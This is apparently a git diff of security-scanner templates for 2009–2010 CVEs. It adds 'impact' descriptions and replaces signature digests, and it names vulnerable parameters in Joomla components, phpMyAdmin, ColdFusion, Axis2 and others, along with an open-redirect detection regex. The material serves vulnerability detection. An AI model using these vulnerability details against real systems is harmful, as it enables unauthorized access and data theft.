b/http/cves/2009/CVE-2009-1151.yaml index 3dcdf47ba4..646906dc75 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: high description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system. remediation: | Update PhpMyAdmin to the latest version or apply the necessary patches. reference: @@ -47,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008e02fe97aa25d53673b25be320c0bb7d2c2f5de32b0479a6642d19caeac3176302204fbb68c73be955fb7ee136f5de9ba91f1183b932cd44a37339a3cb3629f682ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072b55f94dd31deffee60f3cb3634845a62d55cb762cc7ff386cbb87e86628a46022100f409fca70224214acee88679b54a62d491ea8aa4097e70f6ae316fefbf08c8dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 451e83adbc..6f335992fb 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Apply the latest patch or upgrade to a newer version of Joomla! Cmimarketplace to mitigate the vulnerability. reference: @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bf287275ed797bae0cb3d5d4acfc9b8e5bd3828436e45f96592c55c65cb1baa4022100ef79bc142d4be9f1c8cdca1b30e44293bf696b5686318e5ae13a18638f2267ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c631ca9827b32f40f6e831f6b142d509929a3a274aaa2539bd9a3bc70a6a277902202282dc777de13ade8043e5e0b684506c08b0f8362cece8841ae64f2d12922f4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 5edad531aa..66e6bfa43e 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the device, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest firmware update provided by Cisco to fix the local file inclusion vulnerability. reference: @@ -41,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022072672def0c3c68dd608f3004581175afa8c339fb1dbe169c26b79537cc7a0619022100c7d94e2588ae1fc4f1093b3f7e02e4d2aa8e3d985506056636a77e58ba170c1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009c71a1215235e49ed75ae5b6eeee4ad1e9cf5c5fbc2255aa4d4100800dbcc4ba022100814e7f6abe3bd9504fea75427a7595f0867986ff0f82ad2a6723448d3890a0ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 81d0a7f865..ce82b92d4a 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Adobe Coldfusion to a version higher than 8.0.1 or apply the necessary patches provided by the vendor. reference: @@ -48,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f880585c3b7a9bf4bace78a0d12cc7b59987555063071d3b42d5a6ec991e5fc402206d9ea98a5964a7b6b3fd001ec59a4a6a4018795896552e88707057bbf2984cf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bcb065b4315286d0190f8d478c738b86bc6bbf0a9eee7e6b4c473e41e01c1802022100c1f7c414f91bd4fa0876cc2bd72f1be77b892b1d20003177d66640667e38aa3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index cda2bb459b..4ca2de61da 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion). + impact: | + The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, information disclosure. remediation: | Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor. reference: @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ecd994a0eb2717ce10c4b5c91e5280c1fd8fac39010ab27a6e7dd81ad84421d3022061a0659d0ab3cf0e69480b1407ab7d15ea63da4942aa97535f935fe18c40d1ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d8c26e00ba2ed5716865bac39ee41243548410e07a5e04e196f13ecb86b5f6f0022029bacb42734f85338a1131945160673281e9ebda83ca881f2aba07019b4c2330:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 0e4ce039d9..57cfc09f72 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: | Upgrade to a patched version of JoomlaPraise Projectfork or apply the necessary security patches to mitigate the LFI vulnerability. reference: @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100843946ac00e19969b2641e5f8b8c44b890e6dd8226f04c95aa84a62843d6219b0221009a53d57de2bfea8a7b8bb17dd7fd7b8ae9299a4080a7610269331a945dc481df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210091f181784616328a479c0a45ea51ca6e3ec45cf35125c50b1a74018f9dd535a7022100dc27152143b4d3818133866645b2e1e1f647b142875a267d0667d9e9c7c867f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index 4fa1250de8..af5743455d 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: | Apply the latest security patches or upgrade to a patched version of Joomla! Agora to mitigate the vulnerability. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b811a5bc6dc389222b5a3b2f6348b1bcdc4da180e2f621afdd6b06581e7db2be022100f760318fa5da56e59b4164508d2560e355438a21041091b07eb695f19467d51d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a1f28b173218b3d629d38aced121196c827be859dc4aca670b95c7b18307b430022049aa913dbdffabe7a2c1cf439f0b580f53add89ba434c8ad0a2a22652bd51bc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index b5b5fe5691..0500d83687 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php. + impact: | + The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, data disclosure. remediation: | Update to the latest version of Joomla! Roland Breedveld Album and apply any available patches or security updates. reference: @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022025c84025809994ed122c6b1eee98bcf3d7b45244c28b2e007708b624f8fed7ca022100e65d6b60af4d2ac032f3e91762da0bb8d31027cf10958a2c6de7112ec4c2aa69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a8d55e39ef2ea81aef6917c75f74e1c17a628dc7048d68593bbf43b03dc8d86022100ebf7f9db037558e784a25d3fbb3d33cd5aaaa5cfef70c4974e29a2bc48f623b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index c34bbe52a1..a3da99748f 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Upgrade to a patched version of Joomla! Omilen Photo Gallery or apply the necessary security patches to mitigate the LFI vulnerability. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cc34793390f6a455392251d314e76db191c695bb242f901992f2fed5d30deb2a02203db9da85de2f6409024c76ec318dee40be8344b6c1484486afbb1a6986bcf231:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220039a98604f42ee7ccff3678a04d529befe9dd08295868ac0d4e6e725a91cbfd10220045ad4a883e12545de1290ad6fed5f97abefbc452ac43de71e42e1904acbebb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index dbf62e2b38..4cab0df46c 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter. + impact: | + An attacker can exploit this vulnerability to include arbitrary files from remote servers, leading to remote code execution or information disclosure. remediation: | Upgrade to a patched version of KR-Web or apply the necessary security patches to fix the remote file inclusion vulnerability. reference: @@ -42,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a31c2cc438bd399b0ff46d0737df967df4f8636a9545dacfb35f4c0fd16fbfe8022100d8ff3adcae6bbe7f02f215edf09b98d9890993edad83c73ddbfad540d5862f9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f241e186edb9af52a94d640b6a9e57852c75c54669bd59af1aafb3cf6ee08258022100c680d5c1c0b6b27a520c2401d2c1aa0a9978874b840bf8f52c24ba6fc4c50121:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index f7d8a7e9b7..be572176b2 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Apply the latest security patches and updates provided by Joomla! to fix the Remote File Inclusion vulnerability. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008b806c6b509027ab419fab38023c2270cef1e3f60dc3b633fcacb5f8983dd8cf02205a10ec21151ba918555d2ea46f2e687dc5d87cec0d39ebc0a0b57409e230999f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fd99275b8ffe3388f14498c542a677e467dc6409ffdede89b682d47aa5e98d8b02205e878695cd94db9f7e485d448c02aa9df416a8c7cfd6d160dc8197f103e279d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 93bf8a58c2..08a8e291fd 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. + impact: | + Allows attackers to redirect users to malicious websites or phishing pages. remediation: Apply all relevant security patches and product upgrades. reference: - https://nvd.nist.gov/vuln/detail/CVE-2009-5020 @@ -35,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022014c3212369c069e74aced2e09cce019e7e3b3886dfccc0ba176b48f527d4b043022100f78dc1e0ff2cac698e269f9ef77e3fcdcd42093d0b5e83408b716fe56dc61a24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200bd227f253fce18d4e4dd678a4cc08f7497a6058e0f1f1b544eb1e5ba22785f7022069b1097b262d7b9c4eb7fc023566c7c5ed00eba4c26e9dbf4400cbb4b4b9cc58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index 6b4c683be3..4fcbcb99ec 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. + impact: | + An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/36994 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b6c44cb3482f8af652dee916a6c29922919394156205dd5af4613be52de7636c0220267ff1847f78cf578c20c01583d01239ad9f6e99849d7ba6c676758599057209:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c11864aea146ea6435caa4fa55436335832385d19a76a69f9b1e4d0715768f20022064458c5f14208af4e71638abc8560be81a228ca423a9dfbcf3bed250a4e70ed8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 0accd4e0c6..47a5d2a53f 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/10943 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ceeedcc9f9dd5600c7fc59e5441a85a74f2cf464291aaaf3aff0e3a10ff69453022100d99175c115a1b1205fa7d13ea7fc618f6db58e8b226011dfc16aa015c67b1064:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100862d6d8773869cf58419d323a548a4fe4934ffe52e1a773f8332d9c8bbb0efb60221008df16010b4804b0f237b8798cc9cdc67311efd336768a46455967917e0f4bac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 12c6d0ec15..3aa975a83c 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or the ability to modify or delete data. remediation: | Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor. reference: @@ -59,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008aeb0223b59b1f43d1b5d86891682f6fdabd96f95cf747888a3ea67ea2d961a0022100ebb625cdd128e413ab38e6562e20e3b8cebdf838ac95c99355133af62512e6a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100da41e43897f5784bf8aa6bc1dfb5721db7618454aaf6c4182246a13b30b47a86022100ca97f29ef3b646a1cdf2f366ed582fdbfcf01a0a1c1c32ba84089c386e96edf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index dbe1f28190..3c83303be4 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: Apply all relevant security patches and upgrades. reference: - https://www.exploit-db.com/exploits/11282 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204dc0e897ea68285bef1f12bcf5834d2cf101e68c156ce46626c2a06f4985d407022100822e5427795b4bd8e13344064b70a624e097115c521a1eea3ec95769751e9e83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200df40dfac907595943e5906f98bfab1609a82ae9c703da4b7d0fb4ea5284c2b9022073136420b9d293e938fbbd6db582642f6c0f5836eda85d321af7e0855670c72b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index e823a0ff4c..2102ec0059 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. + impact: | + An attacker can exploit this vulnerability to retrieve arbitrary files from the server. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11447 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aecd172f508073b0b8d64784bcb420de171daff3e0a8732d29ac71488c81596f022100f9b3c9f9ed1f055178cca21e303628b061871cbbd562c6202a00d7a71ced76e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100801f99e10fa7f37fb9a01ff4c8eb0a4b11e2193c7e16b9c3b8a0c50ca6e4a242022077c086d823e3b8131dff5b37562334ce5fb778ead2312cb35f1b49c8fc26f8fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 29cd373d06..3d6f5cab73 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11498 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205591d9316f159c3eb27f1e668e68d61205761aaa141dbe50f406eb90e779fa5602207db633a31bf0a118f73eed7a38df4e593557497eafcd2199a5435cf7bf09c1d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220255aee4e219ee166e143888630a4e6af23c3e9b385d922dd866339bdc5d96be2022071f5391c8ceecfede26dd5441388c1f6728c9f693e05b50f408851b94f23f21a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 31ebe56064..d8d2e8e160 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11089 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022006730e9bc41d35c653ab87390772b2a4df527eb5cb3c9344d8dd31c4a2fc4f4202201c6ad57ef58398872f397ae0061c50864c955cd569b5f40316da8f32f5f15289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022078b7a4981e20f380f36effbae103d8a364963690fa024b7b4b7f0a7731eb4faa022074cef19a8c876a25c892881ca87de44f31f764fac0538c01c8de31916e40390c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index 06b53b272d..e423797e96 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: | Update to the latest version of Joomla! Component com_jashowcase to fix the directory traversal vulnerability. reference: @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b4abc2e6bac634509e9798e53e57b2bf8a45ca56ea0a39fd25d23d5cdffeabe102204899c1bede7831fe28b97c5b8da0cc7813575cd66ce76771af9cda761cfefc91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fe6e90550c4cac8714140e552ca1f8dffae1d1cf10acfda1fc2a4f1eeb04e6070220261fe0eb98e8dd254ca2bcec2deb3e7ca3c6a2bb20a00488f400c2ba4764814d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index a0c069d86b..b9411f790a 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11088 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210093fe6fc6aafb9aae82395913f89c943a912983b9c5963c6f58f9b5fa0209f5c9022100f3694c1e8c9202a4cf29516761dba19426b82ac5ac959b3c88540c780c35b698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210087ecb7ece9df8ee3e3e0fc6760a67762868e12f33b0c59f6ea3bc3ccc135a1b10220607ba4bacb84ca32dd3502bcd9973930e71855eb417a6afbb0bc270df349b136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index 3bf1da94b0..af6e5f85dd 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11738 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a6b583f7a3d7c073b0520d3c46a03a8381d6af0c086b1e37d29a024ce3a4736f022100cceb855f29d8dbef1c720e88cc3b9e57f023e4eeed5ff44b55a8b3c5f105e020:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100835d6327ecf3d8a79d891ab1671b58279390bedc0356214c4e0de666716a7abf022100e97639abcc162d391b35333f8165ab636eb06cff21510992ef20035e525b535f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 9557b32d20..16da120308 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further exploitation. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/10942 @@ -37,4 +39,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207804d47856db88004e7d770a6b9e4905869a3bf0bb5f80c77a0db3fc02ab2e0702207ef90a49afdf02b83e9ae8900297deec4d77ec96ed9e67afa4ad99a64d3c1da5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022004764a55873eedeef437f72de5243dc952d7938bf93ba6a44be94b1e3203d4b40221009e8e1775682357e291ce78522ca980a6d8238ef79e4e6f7cf72548f7e5bec5aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index 569a077687..e19aab2f21 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/10948 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022055b85a1187baab16c8619c44f333fa95a769f02d9c90cdc3b92da9af37ea765c022100ec5a4ddaf568dd08d9c499fa59981a08562d8b461b1d21bb0dc8d0479619d3b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f11e7c1ef169ed3e6f170b354e5066def58df0ecb303905be2cb692bc749d50f022100bc2fa70ab2d2506cdd3c9d9a30d099823223d9a45ca34c9ebef974f8ebb45242:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 